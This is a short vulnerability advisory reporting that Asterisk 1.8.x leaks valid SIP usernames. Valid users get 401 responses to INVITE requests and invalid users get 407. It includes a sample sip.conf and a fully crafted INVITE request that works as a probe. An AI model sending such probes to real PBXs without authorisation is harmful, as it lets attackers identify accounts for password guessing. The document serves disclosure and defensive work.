Asterisk version 1.8.x suffers from a SIP remote user enumeration vulnerability.
5bf98cf221d04c51ddb7d1a9e47f9bbb189d3640a8237aa5efd26b53988ad25c
Asterisk, sip response permit username identification through use INVITE
Author: francesco.tornieri \"At\" verona-wireless.net
Summary: Sip responses permit user identification
Release Date: 01/05/2011
Criticality level: Low
Impact: Information leak
Software: Asterisk 1.8.x (tested 1.8.3.2)
Description:
It's possible to enumerate valide sip username through use INVITE request method instead of REGISTER method (a similar problem has been fixed by Digium in 2009 and has been described in this document http://downloads.asterisk.org/pub/security/AST-2009-003.html)
Example:
PBX Asterisk:
----------
sip.conf
----------
[general]
context=outgoing
port=5060
bindaddr=192.168.2.1
realm=asterisk
allowguest=no
alwaysauthreject=yes <----
[template](!)
type=friend
canreinvite=no
host=dynamic
qualify=1000
disallow=all
allow=g729
[100](template)
callerid=phone100<100>
username=100
secret=password
[500](template)
callerid=phone200<500>
username=500
secret=password
------------------------
Craft Sip INVITE example
------------------------
INVITE sip:192.168.2.1 SIP/2.0
CSeq: 3 INVITE
Via: SIP/2.0/UDP localhost:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
User-Agent: TT
From: <sip:105@192.168.2.1>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
Call-ID: 5RRdd5Cv-0771-e011-84a1-a1816009ca7a@lapblack2
To: <sip:500@192.168.2.1>
Contact: <sip:105@localhost>;q=1
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING
Expires: 3600
Content-Length: 0
Max-Forwards: 70
----------------
Method: INVITE
----------------
Valid user (user 100)
Response:
---
Received: SIP/2.0 401 Unauthorized
---
Invalid user (user 1008)
Response:
---
Received: SIP/2.0 407 Proxy Authentication Required
---
Francesco Tornieri